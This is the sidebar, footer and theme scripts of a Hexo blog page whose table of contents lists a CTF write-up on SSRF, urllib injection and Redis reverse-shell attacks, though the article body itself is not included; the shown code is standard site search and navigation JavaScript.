          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/qq.jpg"
                alt="4ct10n" />
            
              <p class="site-author-name" itemprop="name">4ct10n</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">54</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">13</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          <div class="links-of-author motion-element">
            
              
                <span class="links-of-author-item">
                  <a href="https://github.com/actionyz" target="_blank" title="GitHub">
                    
                      <i class="fa fa-fw fa-github"></i>GitHub</a>
                </span>
              
                <span class="links-of-author-item">
                  <a href="mailto:act01n@163.com" target="_blank" title="E-Mail">
                    
                      <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                </span>
              
                <span class="links-of-author-item">
                  <a href="https://www.google.com" target="_blank" title="Google">
                    
                      <i class="fa fa-fw fa-google"></i>Google</a>
                </span>
              
                <span class="links-of-author-item">
                  <a href="1792034533" target="_blank" title="QQ">
                    
                      <i class="fa fa-fw fa-QQ"></i>QQ</a>
                </span>
              
            
          </div>

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://example.com/" title="Title" target="_blank">Title</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-简介"><span class="nav-number">1.</span> <span class="nav-text">0x01 简介</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x02-环境搭建"><span class="nav-number">2.</span> <span class="nav-text">0x02 环境搭建</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x03-题目分析"><span class="nav-number">3.</span> <span class="nav-text">0x03 题目分析</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x1-ssrf"><span class="nav-number">3.1.</span> <span class="nav-text">0x1 ssrf</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x2-python-urllib-注入"><span class="nav-number">3.2.</span> <span class="nav-text">0x2 python urllib 注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-docker-1"><span class="nav-number">3.2.1.</span> <span class="nav-text">1. docker 1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2docker-2"><span class="nav-number">3.2.2.</span> <span class="nav-text">2.docker 2</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x3-redis攻击方式"><span class="nav-number">3.3.</span> <span class="nav-text">0x3 redis攻击方式</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1webshell"><span class="nav-number">3.3.1.</span> <span class="nav-text">1.webshell</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2利用redis写恶意命令"><span class="nav-number">3.3.2.</span> <span class="nav-text">2.利用redis写恶意命令</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3接收反弹的shell"><span class="nav-number">3.3.3.</span> <span class="nav-text">3.接收反弹的shell</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">4ct10n</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.3</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.3"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  
  

  

  

  

</body>
</html>
